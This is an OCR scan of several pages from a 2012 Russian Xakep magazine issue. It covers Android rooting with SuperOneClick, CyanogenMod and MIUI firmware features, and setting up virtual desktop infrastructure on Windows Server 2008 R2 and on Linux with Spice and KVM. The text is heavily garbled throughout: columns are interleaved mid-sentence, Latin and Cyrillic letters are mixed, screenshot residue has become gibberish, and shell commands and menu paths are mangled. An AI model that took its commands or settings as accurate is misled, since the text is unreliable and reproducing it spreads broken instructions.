0.02s 0.02s 0.03s 0.035
077• 002:5 озъ
""""'
ChangeМod~
О.ОЪ
"""""""'
0.02s
ShOIComмod
30.921
\\'мForOevce
0.035 0. 12s 0.02s 0.12s
ShoiComm""'
'""'"'
"""""""" Chan9eiJ.ode
11
......
Remcм.rtng
-·
"dмmonnatn.nW'Ig
startnglnowonpon 5
О.ЗЗs
0.021 1.1~
/ S)'1tem wlh !Ud..,..ТIIe acceu ...
Cre&ng /S)'$1.emh±мn
mkdrfoi&d for /S)'5tem/:Фn . Aeex~!ll.s OK0.02s
MBSSO
lnstalrngsu VsystemlxЬi'!) ...
I:Ю195i9%
·Step ;:l
SIOKВ/s(2&264Ь)tesn00421)
т~
OK012s
1417KB/ s { 1002SS2Ьr!es't1 O.i32s)
tutlllf1gsu Vsystem.IJ!Ьn).
- Siep :;-2
OK002s 1095KB/s ( 16SЗOЬ;1es r.00 15s)
mtlko9 su Vqostemhton)
·Step::З
OK002s П Gngeroreak/Нone•I'ЬolnЬ
-
мclrcмd
ок rri<d.-failedf« /systernhtиn . Filee;oosts 610KВ/s(2Б264b:,tes n O .a:2s)
2.[2.31
Nt4ing Sц>«User ·- . Slep =1 834 КВ/s (1S&521 bytetin0230s) ОКО.ЗЗs
Ch!к:Ь-ogfor~
OK0.02s
0.02s
PushFМe
·1
ок
О.ОЪ
ShoiComm"" lo\ol.ni:S:,ostem
"""'
1"'-..."'
OK012s
О. ОЗ.
O.Oh
....
о,
L\>do<•Chod<
1.0&
ShoiComm""'
Мoi..RS,-stem
11 -~m:)~ ll
""""'
834КВ/s(1S&521Ь;-tes n0 230s)
Rernotning /sysem v.ih reM-cnly access ок
ок
OK1 .16s
ложений на ехt2-разде л карты памяти .
Пр о шивка включает в себя
bash, busybox
Рутинг с мартфона с nомощью
SuperOn eCiick
ХАКЕР
112
www.epidemz.net
04/ 159/20 12
Битвы зеле ных роботов
который можно уста н овить прямо через Марк ет
•
lgoo.gi/W8dJK]. Запустив его, выбираем пункт «Fiash ClockworkMod Recovery>>. Дале е за кидываем на карту памяти прошивку [ее можно
Д ля полной выгрузки пр иложения из памяти
Чтобыпереключатьмузыкальныекомnо зи
можноиспользоватьдолгое нажатиена
ции долгим нажатием кноnки у правления
кнопку <<Назад>>. Н о функцию необходимо
громкостью,активируйда ннуюопцию:М еnu
активировать в настройках: М епu
-7 Settings -7
-7 Settiпgs -7 Applicatioп Settiпgs -7 Developm e пt -7 Stop
Cyaпogen M od Settiпgs -71пp ut
-7
получ ить з д есь: cyaпogenmod .com/devices l и приложения Google lgoo.gl/60chT ]. Вновь воз
арр via loпg-pгess.
Му зыкальный прои г ры ватель также п оддер
вращаемся в
СуапоgепМоd поддерживаетжесты на экране
живаетуnравление жестами: Пл еер
блокировкидлявыполнения различных
-7 Music Settiпgs -7
Rom
Мапаgег и перезагр ужаемс я
в консоль восст-еновления, нажав
<< Reboot into
-7
М е пu
ЕпаЫе gestuгes.
функций или запуска прилож ений. Активация
Чтобы запретитьприложениям выполнять те или
ния [или <<инженерном меню>>, как его любят на
и управление в настройках: Мепu
иныедействия [наnрим ер, отправкуСМС или чте
з ывать студенты технических вузов], нажимаем
-7
клави шу уменьшения громкости до тех пор, пока
L ockscгeeп gestuгes.
не дойдем до пункта <<Wi pe data/factoгy гeset >>,
Цвет и п оведен ие LЕD-индикатора можно
вхо дим в меню кнопкой включения, выбираем
изменить: М епu
<<Yes>>. Возвращаемся на уровень выше, выбира е м << lnstall zip fгom sdcaгd>>, выбираем прошивку, снова нажимаем <<Yes>>. Таким же образом про шиваем прилож ения Google. В конце возвраща емс я в корень меню и выбираем «Reboot system
Settiпgs
В отличие от Aпdгoid, СуапоgепМоd способен
Для устройствснеудобной или сломанной
устанавливать на карту памяти любые прило
клавишей включения можно настроить вклю
жения, вне зависимости оттого, хотят о н и это
чение экрана с помощью клавиши << М еню>>:
го или нет. Полезная функция для владельцев
ПОW>>.
смартфонов с ограниченным объемом памяти,
Menu -7 Settiпgs -7 CyanogenMod settings -7 Lo ckscree n -7 Unlock options -7 М епu unlock.
Recovery>>.
Оказавшись в консоли восстановле
Volume buttoп music contгols.
ИСПОЛЬЗОВАНИЕ
СуапоgепМоd Sett iп gs
-7
-7
Settiпgs
L ockscгeeп
-7
ни есписка контактов], открой менюуправления
-7
Приложе ни ями [Menu -7 Settings -7 Applications -7
-7 Settiпgs-7
Maпag eApplicatioп], выбери нужную программу и в
разделе Peгmissionsтaпни поте м в~зможностям,
СуапоgепМоd
lпteгface > LED пotificatioпs.
которые ты хотел бы отключить .
но опасная, так как не все приложения будут
Чтобы в списке запущенных приложений,
р аботать корректно: Мепu
доступном черездолгое нажатие клавиши
-7 Settiпgs -7
В этом разделе мы поговорим о возможностях
СуапоgепМоd Settiпgs -7 Applicatioп Settiпgs
прошивки . Их много, и почти все- скрыты
lпstalllocatioп.
изме ни значение с nомощью настроек:
в по ль зовательских настройках. Мы остановим
СуапоgепМоd умеет автоматически об
-7 Cyanoge nM od setti ng s -7 1nput -7 Long pгess home sett i пgs -7 Nu mbeг of гесепt apps.
ся на наиболее интересных и полезных.
новляться.Дляэтогоактивируйсоотве~ ствующий механизм: Мепu
Переключатели в выпадающей па н ели. Очень удобн ая вещь, которая перекочевала в
-7 Settings -7 CyanogenMod Settings -7 System -7 Update
MIUI.
•
переключателей можно изме н ить в настрой
Для показа заряда батареи в nроцентах
ках: Мепu
включи следующую опцию: Menu -7 Settings -7 CyanogenMod Settiпgs -7 Status Ьаг tweaks -7 BatteгyStatusStyle -7 Р егсепtаgе.
Widget Buttoпs.
Н
Личные
olll
Система
~ G
-7
Ш 0
19:54
Программы
Н
Личные
Для повышения скорости загрузки отключи
Menu -7 Cyanoge nMod settiпgs -7 DisaЫe boot animation. Там же стоит включитьопцию <<Lock home in
пotificatioпs.
-7 Settiпgs -7 СуапоgепМоd Settiпgs -71пt егfасе -7 Notifi catioп PoweгWidget -7
olll
Система
~ G
Menu
ееанимацию:
По умолчанию их четыре, но количество и су ть
~ 0
<<Домой>>, видеть более восьми приложений ,
-7
19:54
P eгfoгmance
memoгy>>, чтобы заnретить выгрузку рабочего стола из памяти и избежатьсвязанных с этим лагов.
rn 0 ....
Программы
Н
Личные
Система
olll
~ G
19:54
Программы
1
л
~ Звук
Режим полета
Экран
(
'·
•
Устано вка и разработка ПО
00
Менеджер п риложений
НЕТ
Мобильная се ть
>
Настройки
Wi-Fi
>
Н астройки
Bluetooth
Вызовы
@
LЕD- ll\ндикатор
SMS/MMS
(!j Темы оформления
~
Gmail
;._"j
Обои
Настройки прокси
Google Talk •
Рабочий СТ ОЛ
>
Размер шрифта
>
На стройки
VPN ~ Браузер
.::.
Режим модема
ЬJ
•
Переключатели
Календарь
>
1-МЬ
Дат а и время
Ок но настроек
ХАКЕР
MIUI
113
04/159/ 2012
www.epidemz.net
UNIXOID
MIUI с темой Samsung Galaxy 5
•
Основной козырь
Для снятия скриншота на жми кнопку вклю
MIUI- эт о
интеграция
3.
компонентов системы друг с др у гом и общая за
чения и тап ни по пункту «Scгeenshot», он
Встроенная защита от вред о носного ПО. В от личие oтCy a no g e nMod, в котором ограниче
будет сохранен на 50-карте, в каталоге DCIM/
конченность ОС. В отличие от других прошивок,
ния приложений на выполнение каких-либ о
Scгeenshots.
она не выглядит недоработанной, здесь все
опасныхдействий приходитсяустанавливать
подчинено общей идее и работает на удивление
вручную,
DSPManageг, позволяющее управлять на
слаженно. Например, если ты читаешь на сайте
пыткеприложениявыполнитьтакоедействие
стройками эквалайзера по отдельности для
разработчиков о поддержк е тем, то можешь
и предлагает ему выбор « запретить /разр е
различных устройств вывода звука !наушни
быть уверен, что это не просто изменение цвета
шить>>. Так, например, если какая-либо про
ки, динамик].
и внешнего облика графиче с ких элементов,
грамма попытается отправить СМ(, на экране
В состав
CyanogenMod
включено приложение
появится соответствующее сообщение.
а полная модификация всех графических со
MIUI. ANDROID ПО-КИТАЙСКИ
ставляющих прошивки, начиная от анимации
MIUI уведомляет пользователя о по
4.
Встроенный м о нитор сетевого трафика.
Теперь поговорим о дру г ой прошивке со стран
загрузки и заканчивая внешним видом строки
Дей с твительноудобное приложение для про
ным названием М IUI!произносится как «Ме
состояния. И да, конечно ж е ты получишь в рас
смотрастатистикииспользованияинтернета
1»1. В отличие от CyanogenMod, развивае
поряжение менеджер тем , п о зволяющий искать,
по дням и неделям с возможностью установки
мой сообществом на добровольных началах,
просматривать и устанавливать новые темы, ко
лимита, а также полезной функцией авто
за разработку
торые будут автоматически з акачаны с сервера
отключения ЗG nри отсутствии активности.
You
MIUI
отвечает вполне реальная
китайская компания Xiaomi Tech lxiaom1.coml,
проекта. То же самое можн о с казать и о любом
В качестве бонуса доступен встроенный
бизнес которой строится на разработке мобиль
др у гом элементе ОС, включая стандартные при
брандмауэр, позволяющий отключать интер
ных приложений для операционных систем
ложения для доз во на и отправки СМС. Трудно
и Аndгоid.Запущенная в
2010
iOS
году, компания
описать все это по пункта м, поэтому я ограни
нет для отдельно взятых приложений.
5.
Встроенный файервол для блокирования
изначально специализировалась только на
чусь своеобразным хит-парадом возможностей
звонков и СМС-сообщений от особо назой
разработке стека приложений для Andгoid,
МI Щ которых нет ни в
ливых.Вполнестандартный,ноотлично
включающего в себя музыкальный плеер, гале
более, в стандартном Andгoid:
рею, камеру, номеронабиратель и п риложение
1.
для работы с контактами. П озднее
CyanogenMod,
ни, тем
приложений, половина из которых вообще не работает.
По большому счету, ничем не лучше и не
Xiaomi Tech
объединила этот набор с нарабо т ками проекта
хуже DialeгOne, но о н включен в комплект ОС
CyanogenMod и начала работу над новой про
и полностью подчиняется менеджерутем.
шивкой с полностью переработанным внешним
функционирующий, в отличие от сторонних
Номеронабиратель с поддержкой Т9-поиска .
2.
6.
Встроенная программа для бэкапа прило
жений и настроек !с возможностью хранения в облаке].
Простоеистильноеприложениедляработы
Регулярные ОТ А-обновления раз в неделю.
обликом, поддержкой тем, собственным домаш
с СМС, которым дейс т вительно удобно поль
ним экраном и многими другими новшествами.
зоваться. П риложение уведомляет одаставке
Каждую пятницу с мартфон будет предлагать
В результате получилась стильная и неверо
СМС адресату, выводиттекст пришедшей СМС
установить новую версию прошивки в полно
ятно удобная в использовании операционная
прямо на экран, предоставляя возможность
система, которая к текущему моменту не менее
быстрого ответа, и тоже подчиняется установ
известна, чем
ленной теме.
Cyanogen Mod.
7.
стью автоматическом режиме.
8.
Синхронизация с облаком.
MIUI умеет
синхронизироватьприложения,настройки,
ХАКЕР
www.epidemz.net
04 / 159/2012
Битвы зе л е ны х р обо т ов
•
Официальные
аппараты
Google, Google Nexus Опе , Google Nexus 5 и Samsuпg Galaxy Ne xus,
такие как
и з начально имеют
rооt-дост у п .
• Название MIUI состоит из дву х
ч асте й :
значит
Ml, которая
Moblle
lпterпet !или, как это ни странно ,
Missioп lmpossiЫel , и
Ul- User
lпterface .
Таким образом в с ово ку пности название можно перевести как
<< интерф ей с для мобильного интернета » .
MIUI со стандартной темой
9.
контакты, бзкапы и прочее с собственн ы м
iiilf.illel:lk!j
облачны м сервисом.
Установка
Возможность изменения разме р а ш р иф т а
стью аналогична установке Суапоgеп М оd,
падающем ме н ю откроетокно настройки
сразу для всех приложений. Одна из тех
за исклю ч ением тог о, что приложе ния
соответствующей опции.
функций, которой так не хватае т в стан
Goog le,
дартном Andгoid.
входят в комплект прошивки, и их не нужн о
10. Менеджер запущенных приложений с воз
MIU I
окно голосового nоиска.
насмартфон почти полно
такие как Мар кет и
уже
Gmail,
4.
что в оригинале
MIUI
азиатские языки, так что придетс я восполь
разработчиков
зоваться одной из неофициал ь ных сборок,
MIU I
в слишком большой
похожести прошивки на
iOS,
операционную
ситься.
MIUI
просто пропитана духом
iOS,
он здесь везде: в меню, иконках, каждая из
горизонтальной линии.
6.
проигрывателю .
Те, кто п редпочитает использоват ь англо
7.
в nроцентах [Settiпgs -? System
с сайта miuiaпdгo1d . com [смотрим раздел
Notification Jпdicatoг Style -7 P eгceпtagel.
ROMsl. Всем остальным- добро пожаловать m 1u1 .su , автор
В.
на русскоязычный ресурс
других элементах. Д аже стандартный до
которого самостоятельно переводит каждую
9.
машний экран выполнен в стиле
новую прошивкуна великий и могучий.
iOS:
меню
Система умеет отображать з а р я д батаре и
язычные версии ОС, могут с качать прошивку
шенными углами, цветовой схеме и многих
которых обрамляется в квадрат со ско
Дважды нажми на часы на экране блоки ровки, чтобы получитьдосту п к медиа
перев еденных на другой язык.
с истему iPhoпe, и с ними труд но не согла
Для удаления сообщения в СМ С приложении быстро проведи пальцем по
поддерживает только
дегтя. Многие пользователи упрекаю т
Для снятия скриншота одновременно на ж
громкости.
5.
отнестись с осторожно стью. Дело в том, К сожалению, не обошлось и без ложки
Долгое нажатие на переключатель в вы
ми кно пку<<Меню» и клавишууменьшения
до устана вливать отдельно. В то же время к выбору источника для скачива ния следует
можностью выгрузки из памяти.
3.
приложений в нем нет, все установленные
-7
Batteгy
-7
Наж ав кнопку << ДомоЙ >> на экране блоки ровки, ты включишь фонарик. На экране блокировки тап ни два раза по значку СМ С. чтобы прочитать последнее
Также нужно быть очень внимательным
сообщен ие.
программы сразу попадают на рабочий
в выборе версии. Здесь все крайне запутано:
стол, при заполнении которого создается
например, текущая стабильная версия имеет
рабочий стол выбери и удерживай иконку
новый, а затем- еще один, и так далее. Так
номер
одним пальцем, а другим- проматывай
что, установив сотню программ, ты будешь
бета-версия-
тратить время в основном на то, чтобы про
2.3.7,
в то время как разрабатываемая
2.1.20, а порт на основе ICS [Andгoid 4.01- 2.1.13. В общем, смотри в оба.
кручивать рабочие столы в поисках нужной
софт ины [справедливости ради стоит ска
10. Для
ИСПОЛЬЗОВАНИЕ
перемещения иконки на другой
рабочие столы.
I:I§I:I•J!tl Д ля мно г их пользователей Суапоgеп М оd
зать, что установить альтернативный лончер
Ничего сложного в общении с
система все-таки позволяет!.
ржавого чайника нет. Главное- запомнить,
нежели стоковые прошивки смартфонов
Второй нед оста ток
состоит в ори
MIUI
даже для
и
MIUI
могут стать гораздо лучшим выбором,
что здесь отсутствует меню, и все приложен и я
с собственными наработками компаний.
е нтированности на рядового nользователя.
будут установлены прямо на рабочий стол. Тем
И они превращаются просто в спасение, когда
Здесь нет ни продвинутых нас т роек, ни
не менее, есть несколько моментов, знание
производитель намеренно отказ ы вается от
в комплекте, ни, тем более, под д ержки уста
которых сильно упрощает жизнь. Итак, хит
обновления своего аппарата д о новых версий
новки приложений на ехt2-раздел. Красиво,
парад скрытых возможностей
операционной системы. В мире открытых
яр ко, удобно, но слишком скучно для тех, кто
1.
MIUI
ssh
любит поковырять ОС и общается с зеленым роботом на ты.
ХАКЕР
2.
MIUI.
Для отключения звука звонка просто по
исходных кодов всегда найдется разработ
ложи с мартфон экраном вниз.
чик, готовый выполнить порт или добавить
Д олгое нажатие на кноnку поиска откроет
функцию, которой так не хватало. ::Х::
04/159/2012
115
www.epidemz.net
SYN/ACK
Сергей Яремчук [gгindeгlasynack.гul, Евгений Зоб нин ljlmlasynack . гul
терминальных систем РАЗВОРАЧИВАЕМ ИНФРАСТРУКТУРУ VDI НА WIN2K8R2 И LINUX
С ростом размера сети типичная среда, включающая ОС, приложения и данные, разбросанные на множестве компов, становится громоздкой для управления, а пользователи ока з ываются привязаны к своему рабочему месту. Было предложено несколько те х нологий, призванных решить данную проблему- терминальные серверы с централизованным хранением данных , переносимые
профили, виртуали з ация ОС. Но в итоге пришли к логическому финалу- виртуали з ации рабочего стола.
ХАКЕР
116
www.epidemz.net
04/159/2012
Н овая эра те р м ин а льны х с и с т е м
...W.!!
__
,
:
IJ
--
~"".:.""-"':="""21
~
Выбор служб ролеК
1
~~-j=. ...... ~
-~ ~УА-~tт.
~ :::~_:._--:.=-=
•=ы
'"'"~-~~=-;::-"":::m!I:::::!!81--E "":"~'"~ !0'."",.,~-
~ --
J -
- =~~~ ~~~~ ~.
. .-
C tkeo-y-~n
c ~-noA~~,,-~('!0/IY
C W~>o•r•--~n
~CIIJ'dr-~~тo-
06.wooo
"'~Oclourl 'll,o-..c.c.o.>.
--o~PI6c>olroC1VIII
--
=:::.:..""';~.:-- оа-
J. Guaт
~ -IQ"n_fll)
!
.I Щ.,..SIASS
---
." .~0.00
. ~ ""'....__.........
1
. '"" _ _
__
,_~
............
:_F--::::-==-
:.J,sa--'dl*l
8"'P'YaJIIOfJIUIII yдn~~oн~WII: рnбочиж С'ПU>ОВ~
~·....-У»а
,
'='~~----~~" · --
~
II006.aAioiМЫQ Д/101 O<DН.-oot< ПI '"У:моn
....... ... ....,.,__
~-~..._
,__..,..,.._,C'fOIIJ
...
'!l,c--.U:oon
-i'."-"*'rC
pone 'l,
cь--C:ON•
. -"' __ __ 1
~.,..:::~.::--=~ -....,_ ..
i
"".~Corm
" -~
Добе8011 1о cny.a&,.o
~----po&o..\ctall
от_...,.,.,__,..,._бr..,т~--••
itl oa.-..Guts~r
~-
1"_ IYwN•- 1~ 1Т•-1
гь--·-~~~-
,l,Or'IЦIIЯW'ro
Lм......,..,..~r----o-
.!J.!!J
Чl*<ffl!n"l] e.a.--Jer.eм ]с.-] у_.".__
~ ...,.".".
1
"~-·-
~~
""""-
~~
_
1 n,;"""ymr6mpJmgrgsfetpo/!ll?
Роль у з ла виртуа л иза ции рабочи х столов требует наличия
Н астройка личного виртуа льн ого рабочего стола в << Свойства х н nользователя
Hyper-V
НАСТРОЙКА VDI В WIN2K8R2
AD
з ователь закончил работ у, виртуальная машина останавливается
Наиболее интересные возможности служба Teгminal Seгvices по
и б ольше не расходует ресурсы сервера, хотя при следующем об
лучила с выходом
ращ е нии требуется некоторое время на ее запуск.
Win2k8R2,
причем чтобы nодчеркнуть значимые
изменения в функциях, она была переименована в
Информация о переональном рабочем столе, назначенном пользова
Remote Desktop Se г vices [RDSI . В частности, благодаря реализации технологии VDI [Viгtual Desktop lnfгast г uctuгel Win2k8R2 теnерь может являться частью инфраструктуры DaaS [Desk top as а Seгvicel. Новая роль RD Viгtualization Host п редставляет собой сервер с ролью Нурег-V с nодготовленными VM, достуn к которым реализуется традици онными средствами RDS по nротоколу RDP. П ользователь вмес т о
те лю , хранится в AD [при функциональном уровне домена Win2k8R2/, посмотреть и скорректировать ее можно в свойствах учетной записи
I<< Active Diгectory ·>Пользователи и компьютеры>>/, во вкладке «Лич ный виртуальный рабочий стол» [Peгsonal Viгtual Desktop/. В VDI соединении участвуют все комnоненты RDS: RD Web Access - страница входа, предназначенная для подклю·
доступа к отдельному приложению получает полноценное [хотя
чения , выдается список достуnных виртуальных рабочих столов
и виртуальное/ рабочее место, которое настраивает полностью по
и приложений;
своему вкусу и в соответствии со своими задачами. Подключаться
RD Gateway -
к своему рабочему столу он может nрактически с любого устрой
вне корпоративной сети;
ства, интегрированного в сеть - тонкого клиента , ноутбука , ПК или
RD Connection
с мартфона. Системные требования к клиентскому ПК минимальные.
пользуется для балансировки нагрузки, отслеживает и восста
Внешне TS/RDS от VDI для пользователя мало чем отличается,
обеспечивает доступ пользователей, находящихся
Вгоkег -управление подключениями к VM, ис
навливаетсоеди н ения;
ресурсы, чтобы восстановить работоспособность, nонадобится пара
Remote Desktop Session Host [RDS HI - основная роль, обеспечи вающая подключение к удаленному рабочему столу и RemoteApp; RD V i гtualization Host [RDV Н /-обеспечивает функциональность VDI, требует наличия роли Hyper-V [если таковой нет, она будет
минут, упрощено хранение данных, обновление и распределение
автоматически предложена мастером установки/;
но переход к последнему имеет ряд плюсов- каждый получает
переанальный набор ОС и приложений, сбои и вирусы не окажут влияния на другие системы. Ад м инистратор четко устанавливает
хранилищелицензий
лицензий ПО. Нужен новый рабочий стол- пожалуйста: одно дви
RD Licensing -
жение мышкой, и пользова т ель уже может работать.
дней возможна работа в тестовом режиме.
RDS CALs,
в течение
120
Виртуальные рабочие столы могут быть: Peгsonal Viгtual
Desktops- nереанальным и,
когда каждый
Сам процесс подключения к
VD I nрозрачен, nользователь выби· VD I в RD Web Access или запускает подготов
nользователь получает ин д ивидуальный образ ОС с полным до
рае т назначенный ему
стуnом, может настраивать рабочую среду по своему усмотрению,
ленный
пользовательские дан н ые хра н я т ся в самом
на основе его nрав в домене.
Viгtual
VD;
Machine Рооl -общий с унифицированными настройками VDI, пользователь, запрашивая доступ к пулу,
RDP
файл, все остальное будет выполнено автоматически
Все настройки ролей производятся в соответствующих консолях:
и Приложениями
« Диспетчер Нурег-V», «Конфигурация узла сеансов
RD P»,
« Д исnет-
по л учает л юбой с в ободный д есктоn, по окончании р аботы все
дан н ые и настр о йк и в об р азе не сохра н яются. П ереанал ь ный и общий
VD соз д аются
из заранее по д готов
ленных администратором н аборов образов и отли ч аются лишь на значением и возможностью сохранения изменений. Общий рабочий
стол удобен, когда требуется временный доступ [например, при
обучении, семинарах/, или ко гда д анные хранятся централизован· но, а для их обработки используются специфические приложения, не требующие nодстройки на клиентской стороне. Если сеанс не заканчивается, а просто производится отключение от общего
VD,
то все данные сохраняются, и nользователь может в любой момент
вернуться к работе. Еще один важный момент: как только поль-
ХАКЕР
С
VDI
ПОЛЬЗОВАТЕЛЬ ПОЛУЧАЕТ
ВИРТУАЛЬНОЕ РАБОЧЕЕ МЕСТО, КОТОРОЕ НАСТРАИВАЕТ ПО СВОЕМУ ВКУСУ И В СООТВЕТСТВИИ СО СВОИМИ ЗАДАЧАМИ
04/159/2012
117
www.epidemz.net
SYN/ACK
чер подключений к удаленным рабочим столам>> и других. В частно сти, в << Д испетчере подключений ... >> после стандартной настройки
ролей Нурег -V и
RDS
[JLJ;=;LITY У
1 а 1 U R L D! 5I 111
Р
следует подключить сервер узла виртуализа
'"'"'"
ции [Add RD Viгtualizatioп Host Seгveгl и запустить <<Мастер на с трой ки виртуальных рабочих столов>> [Configuгe Viгtual Desktops Wizaгdl, который поможет добавить в список все узлы с Нурег - V, с ерв ер Conпectioп Вгоkег и
RD Web Access.
RD
AD
или запустив мастер назначения в ир т у
ального рабочего стола [Assigп Peгsonal Viгtual Desktopl. Пул VD также создается в
.. Machiпe
Pool
RD
Coппection Вгоkег при помощи мастера V iг t u a l
Cгeation Wizaгd, который запроси т два парамет р а
имя пула и имя
RD
Connectioп Вгоkег. В настройках всех серви со в
помогает анализатор соответствия рекомендациям [BPAI.
Когда
UNIX
Swrch
Теперь осталось лишь на з н ач ить
пользователям виртуальный десктоп. Это можно продела т 11 в с в ой ствах учетной записи
Virtu a l m a chi nes
' "_
о о о о
.. •'
•
о
[ start
'
Ust r
'
Ols klmev e
~
S 1a1 1
Bt o cko:d
ru n niГIQ
UnЬiock
Block
"""
В е б-ин те рф е й с
перешел из эпохи текстовой консоли в эпоху графич ес ки х
'
s•ntl
' "'
-
runnlnq
runnlrWJ
~' o r
OVD Web Administration Tool
деокарты, что позволяет ему применять множество различных техник
интерфейсов, вопрос о связи терминалов и серверов , казалось , б ы л
оптимизации передачи тяжелых данных, включая сжатие изображе
решен. Графическая подсистема
ний, видеопотоков, интеллектуальное распределение нагрузки между
UNIX
была разработана с целью обе
спечения сетевого доступа к удаленному дисплею и позволяла сде
клиентом и сервером, синхронизация видео - и аудиоданных. Являясь
лать это легко и без лишних хлопот. Админ просто авторизировал воз
пр отоколом достуnа к виртуальным машинам,
можных пользователей и запускал на терминалах Х-сервер, который
де л ять для различных групп пользователей виртуальные машины,
принимал запросы на отрисовку графики от приложений, работающи х
раб от ающие под управлением различных ОС. В целях безопасности
на мэйнфрейме. Простая и понятная схема, превосходно работаю-
к ажд о м у пользователю можно выделить собс т венную виртуальную
Spice
позволяет вы
щая в 80 - х. Сегодня д оступ к удаленному рабочему столу с помощью
м ашин у. В общем и целом инфраструктура сети тонких клиентов, по
Х-протокола просто бессмысленен. Современные приложения уже не
строенная с использованием
испол ь зуют простые и легковесные команды для отрисовки своего ин
ПК, снабженных простым Sрiсе-клиентом, и мэйнфрейма/кластера, на
терфейса, а работают с графическими буферами, постоянно посылая
к отором крутятся виртуальные машины с поддержкой Spice - cepвepa
Х-серверу команды по их отрисовке и обновлению. Это очень мощный
[п о одной на каждого клиента или же на группу пользователей!.
и тяжелый поток данных, с ко торым едва справляются современные
Компания
каналы связи. В и д ео при таком способе обмена данными, например,
по старалась, чтобы интегрировать под д ержку протокола во все воз
смотреть уже невозможно. О д ним из способов решения этой проблемы
мо жные средства управления виртуальными машинами. Сегодня
является перехо д на более со в ременные, интеллектуальные про
в с т роен в
токолы доступа к удален н ому рабочему столу.
а л ьн ыми
примеров такого протокола. По су т и
Spice
Spice- один
из лучших
является механизмом дост у
Spice, будет
выглядеть как набор простых
Red Hat, купившая разработчиков Spice в 2009 году, хорошо
Spice OEMU, библиотеку l ib vi гt и инструменты управления вирту машинами типа v i г t -maпageг и viгsh. П сеададрайвер Spice,
поз в о ляющий выжать из протокола все, уже доступен для Х-сервера,
па к уд аленным виртуальным машинам, позволяющий пробрасывать
а в качестве клиентов доступны простой
по сети не только изображение рабочего стола, но и многое другое,
Win dow,
включая устройства ввода, USВ - порты и аудиопоток. Передача этих
с ких клиентов на основе библиотек GТК и
данных осуществляется настолько эффективно, что даже на не самом
высокоскоростном соединении пользователь может свободно поль
spicec,
работающий поверх Х
специальный плагин для Fiгefox, а также несколько графиче
Ot.
Фактически, все что нужн о сделать для запуска простейшей
Sрiсе - с ети- это выполнить две простые команды:
зоваться всеми услугами современных графических сред, смотреть
видео, проелушивать музыку и, в общем-то, делать все, что угодно [н е
1.
На с тороне сервера:
удастся, пожалуй, разве что играть в современные игры!. Сервер Spice встроен в виртуальную машину и работает на уровне виртуально й в и-
$ sudo apt-get i nst al l qemu-kvm
"~
Настройка nараметров nеренаnравления д/111 ~0C'Т~JC/Иtti1., JI OCТJf\800:11М111Y.,..._ I)aбoo.& .,cтon.oтl)e5 yeтaceQIIOtO
YJ/\ot C~/IНC08'fii~~CТ0/108,paбaт/IIOIWМ IJ ~~.
!
~:::::z.:=~CТO/IOIIIOpeol-~j'Je
~oбwoбo.~г.ep~np•r.'lf""fi\IS'.v<ТO&, IOCI"IO..-:IV-ПOJ:Itr.80'o~t~ YlllllflН>мy p.W~t>!Y
("JOI"f
~~11ом6. ! ~лм6or.tt p...,.ti, eeptw~ ~-о yu~n.
r!f/JtiШNM\I!IШ><tQOCQI
1 C.epDeJI\'31'i&U:IIНC08yJI;-po6oo....ruOI'CII6YAn"'"0Nтжeo<М~till ~. Euo<<tiii'ТONT жeo<611><К1pg;.ц,apeep6\'}NI !Ч ~~toe
тpdiyrra~, уц_.,.~Фмхоо< 'Нetcnoiii>)084t ь810NТII'IКq'IO~·.
fcno Amt~'"lt(l'"ol>noJyrr(.A ~~ pnoete!lttCIJ8 YJI~~CТO/IOII,TOtteOfii<041-IIII'I"*fVVIIIIКТtiOOI1ЪI<S ~ое ~ ~в~.
г
OLJ.-.LIT'тl V 1R1 U Rl
Мастер настройки виртуальных рабочих столов
Подключ е ние к удаленному рабочему столу
О
ES
К
www.epidemz.net
О Р
OVD
ХАКЕР
118
1
04 /1 59/20 12
Н овая эра т е рминальных систем
[
Logiп
("
Password гedeпtials
se local
Ulteo
D. .
'-'-'
о 1
О Yes @ N o
Fнllscгeen
~1
~ 1 English (U S)
Langнage
Keyboard
1
[ Desktop ~
Mode
0:::'
layoнt
Advanced settings
Веб-клиент
О Yes @
1 English
J
~1
(US)
L§.Jinect
J
Ulteo
$ qemu-k vm -s pice
port=1234,disaЬle-ticketing
Демон должен запуститься автоматически, в противном случае
-hda / п уть/ до/образа/ дис ка
стартуем его самостоятельно:
2. На стороне клиента:
$ su do /etc/ i ni t .d/libvirtd start
$ sudo apt-get install spice-c l ient $ spicec -h loca lhost - р 1234
Теперь идем на машину с икса ми, ставим virt-manager и подключа
Для тестирования этого вполне достаточно, но для развертыва
$ sud o apt-get install v irt - manager $ v i rt -manager - с qemu + ss h: //root@se rv er .com /sys tem
емсяк libvirtd:
ния сети с десятком -д ругим клиентов, работающих с разными
ОС, гораздо удобнее воспользоваться графическим менеджером виртуальных машин viгt - maпageг. Я не призываю устанавливать на
Нажав на кнопку «Новая>>, создаем новую виртуальную ма
сервер иксы, потому как viгt-manageг может работать и удаленно,
шину с нужными опциями, про изводим установку ОС, тестируем.
посылая команды демону libvirtd по ssh. Итак, ставим на сервер qemu, libvirt и демон libvi r td :
Если имеем дело с UNIX, обязательно устанавливаем видеодрай вер для Spice-cepвepa xorg-video - qxl, без него большая часть
оптимизаций не будет работать. Д алее выключаем виртуальную машину, выбираем пункт меню «Вид-> П одробности>>, нажимаем
$ sudo apt - get install bri dge -utils dnsma sq \
<< Добавить оборудование>>, выбираем пункт <<Grap hics>>, в поле
kvm qemu l ib v irt libv i rt -bin
<<Тип>> указываем <<Spice server>>, указываем нужный номер п орта
ТЕХНОЛОГИИ
MED-V
И
APP-V
Н е редко в организациях можно встретить приложе н ия , работающие
Внешн е такое приложен и е работает какобычно е [его ви д но в мене д жере
только под Win X P-пepeнoc и х под новы е Wi п 7 или Vista неваэмаж е н ил и
задач), но выполняется в особой виртуальной среде. По сути, Арр-V- з то
нецелесообразен . Даунгрейд ОС также неприемлем, самая банальная
у добно е сре д ство доставки прилож е ний, работающи х в родной среде
причина- нет драйверов под новый ноутбук. Д ержать отдельный
(в отличиест М ED-V), нетр ебу ющее выделен и я подни хо тдельного П К или
ком п лишь для одной древней проги тоже н е выход . Технология MED-
подключ е ния к терминальномусервису. Назначен и ем приложений можно
V (Microsoft Enterprise Desktop Viгtualization , clck .ru/WQgT I является неким аналогом реализации VDI, но на клие н тской сторо н е. Одной и з основных ее частей является всем известный ХР Mode, позволяющи й за пускатьви рту ал ьную ОС (Wi nXP!Vistal в специальной peдaкцииV i rtual
управлятьпри помощи гр у пповы х полити к , такжепросто и у братьдоступ ,
